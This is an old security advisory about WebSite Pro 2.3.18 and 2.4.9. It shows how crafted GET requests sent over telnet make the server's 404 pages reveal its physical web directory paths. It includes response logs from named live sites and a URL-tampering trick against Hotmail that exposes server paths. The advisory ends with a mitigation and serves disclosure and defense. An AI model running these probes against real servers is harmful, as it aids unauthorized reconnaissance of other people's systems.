COMMAND

    WebSite Pro

SYSTEMS AFFECTED

    WebSitePro 2.3.18

PROBLEM

    Lark Lizerman found following.  WebSite Pro is also  revealing the
    webdirectory of each Website by  a simple command line.   This bug
    is similar  to the  "IIS revealing  webdirectories" bug  reported.
    On WebSitePro  the diference  ist the  way you  retrieve the path.
    Example (Made with MS Windows Telnet Client):

    Logfile:
    ========

        GET /HTTP1.0\    <------ Our command we send via Telnet on port 80 to the webserver

    Response:

        Content-length: 186

        <HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
        <BODY bgcolor="White"><H2>Document Moved</H2>
        This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here </A>.<P>
        </BODY></HTML>
        GET /HTTP1.0/
        Content-length: 230

        <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY bgcolor="White"><H2>404 Not Found</H2>
        The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
        </BODY></HTML>

    Here   it    shows   us,    that   the    HTML   files    are   in
    D:\WEBROOTS\VHOSTS\aktenet\htdocs.   It's not  a large  threat but
    an attacker might gain  information about the server  which should
    stay in Admin's  hands. On all  Webservers e.g. MS  IIS and Apache
    the response is "error 404".

    A tip from Noah  Rathaus about WebSite Pro  latest version(2.4.9).
    He  mentioned  a  server  where  WebSite  Pro.  2.4.9  is run.  He
    discovered, that also the latest version is vulnerable to the  bug
    of revealing  webdirectories.   In the  new version  there must be
    made a change to retrieve the directoryname.  When you connect  to
    a server send the command line:

        GET /HTTP1.0 \

    You have  now to  add a  space before  the last  backspace of  the
    commandline.  That makes the server respond with a "404" error and
    and prints the directoryname.   Here is the part from  the logfile
    of Windows Telnet Client (website.oreilly.com):

        GET /HTTP1.0 \

        HTTP/1.0 404 Not Found
        Date: Thu, 13 Jan 2000 20:47:12 GMT
        Server: WebSitePro/2.4.9
        Accept-ranges: bytes
        Content-type: text/html
        Content-length: 216

        <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY bgcolor="White"><H2>404 Not Found</H2>
        The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c:\1Web\docs\website\HTTP1.0)</CODE><P>
        </BODY></HTML>

    Here it shows us the directory "c:\1Web\docs\website\".

    Hotmail? Get into your Hotmail  account. After you are logged  in,
    modify in the string  address the part with  "disk=216.33.148.68_"
    in something  like "disk="abc.beh.doh.cih_".   Put string  text in
    the  place  of  the  IP  address.   It  will give you a nice error
    revealing directory structure  of server and  you will be  able to
    understand after this a big part of address string.

SOLUTION

    Vendor contacted and informed about the bug.  Expecting  statement
    about fix.  Every version of website (1.x, 2.x) seen behaves  like
    this  in  standard  configuration.   However  you  can  avoid  the
    revealing of webdirectories by installing either one of two freely
    available WSAPI  extensions which  then send  out custom  404, 403
    and 401 messages.  For more information see:

        http://software.oreilly.com/techsupport/kb/website_kb_article_display_frame.cfm?ID_KBArticle=102